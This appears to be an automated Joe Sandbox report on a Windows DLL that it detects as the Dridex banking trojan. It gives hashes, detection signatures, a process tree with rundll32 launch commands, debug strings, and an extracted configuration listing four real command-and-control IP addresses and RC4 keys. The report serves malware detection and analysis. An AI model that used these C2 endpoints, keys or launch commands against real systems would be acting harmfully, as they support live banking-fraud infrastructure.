Play interactive tour

Edit tour

Windows Analysis Report Pv3ZsGsdfS.dll

Overview

General Information

Sample Name:	Pv3ZsGsdfS.dll
Analysis ID:	544850
MD5:	63c22ce32346e029fa5a1ec1ae619d0f
SHA1:	222cf86c3b59f466292bb734be308cda77c3ddff
SHA256:	efbd76616dc1cd8210a8c54611f4ffa88e635f0f6ded2f8ff48311737635edda
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6484 cmdline: loaddll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 1964 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4492 cmdline: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 676 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.297484396.000000006EC61000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.299069466.000000006EC61000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.335772232.000000006EC61000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.6ec60000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6ec60000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6ec60000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6ec60000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1964, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, ProcessId: 4492

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.0.rundll32.exe.6ec60000.5.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Pv3ZsGsdfS.dll	Virustotal: Detection: 29%			Perma Link
Source: Pv3ZsGsdfS.dll	ReversingLabs: Detection: 34%

Source: Pv3ZsGsdfS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: Pv3ZsGsdfS.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.308533715.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308222628.0000000004CDF000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308255759.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308328163.0000000002E05000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000006.00000002.331836488.0000000000AA2000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.301339614.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308246821.0000000002DFF000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.308408730.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308332357.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308259118.0000000002E0B000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb&ME source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdbgX source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb2MY source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: Pv3ZsGsdfS.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.301339614.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb\ source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb_ source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.308408730.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308332357.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308259118.0000000002E0B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.308533715.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308255759.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308328163.0000000002E05000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb MK source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb,M_ source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000006.00000002.333232466.0000000004C4B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.327130247.0000000004C4B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.297548303.000000006EC7F000.00000002.00020000.sdmp	String found in binary or memory: http://www.baxleystamps.comDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6ec60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6ec60000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6ec60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6ec60000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.297484396.000000006EC61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.299069466.000000006EC61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.335772232.000000006EC61000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: Pv3ZsGsdfS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: Pv3ZsGsdfS.dll

Binary or memory string: OriginalFilenameShi.dllD vs Pv3ZsGsdfS.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 676

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC70730	0_2_6EC70730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC79370	0_2_6EC79370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC6A4E8	0_2_6EC6A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC61494	0_2_6EC61494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC68428	0_2_6EC68428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC7143C	0_2_6EC7143C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC72234 NtDelayExecution,		0_2_6EC72234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EC72820 NtAllocateVirtualMemory,		0_2_6EC72820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: Pv3ZsGsdfS.dll	Virustotal: Detection: 29%
Source: Pv3ZsGsdfS.dll	ReversingLabs: Detection: 34%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 676
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4492

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER420B.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Pv3ZsGsdfS.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: Pv3ZsGsdfS.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.308533715.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308222628.0000000004CDF000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308255759.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308328163.0000000002E05000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000006.00000002.331836488.0000000000AA2000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.301339614.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308246821.0000000002DFF000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbk source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.308408730.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308332357.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308259118.0000000002E0B000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb&ME source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdbgX source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb2MY source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: Pv3ZsGsdfS.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.301339614.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb\ source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb_ source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.308408730.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308332357.0000000002E0B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308259118.0000000002E0B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.314222507.0000000005030000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.308533715.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308255759.0000000002E05000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.308328163.0000000002E05000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb MK source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.314209499.0000000005061000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb,M_ source: WerFault.exe, 00000006.00000003.314228621.0000000005036000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EC6F6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6EC6F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
